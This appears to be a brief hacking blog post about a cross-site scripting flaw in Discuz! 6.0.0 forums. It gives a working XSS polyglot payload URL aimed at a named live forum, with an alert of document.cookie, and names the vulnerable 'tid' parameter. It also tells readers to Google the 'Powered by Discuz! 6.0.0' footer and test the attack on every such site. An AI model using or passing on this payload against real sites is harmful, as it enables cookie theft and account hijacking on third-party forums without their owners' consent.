http://forum.maxthon.com/viewthread.php?action=printable&tid=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Yes, i found bug in the Discuz 6.0.0, but later i read about it on the packetstormsecurity.org. And we can see interesting..
http://packetstorm.wowhacker.com/1001-exploits/discuz600-xss.txt
Now it's don't work. Yes. Only with tag marquee, if use that code.
But if we can use another code:
http://codepad.org/T8nEpahe
And another place (it's the best)
viewthread.php?action=printable&tid=[xss is here]
This is a good work on the all sites powered by Discuz! 6.0.0
You can see in the google and test this:
Powered by Discuz! 6.0.0
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.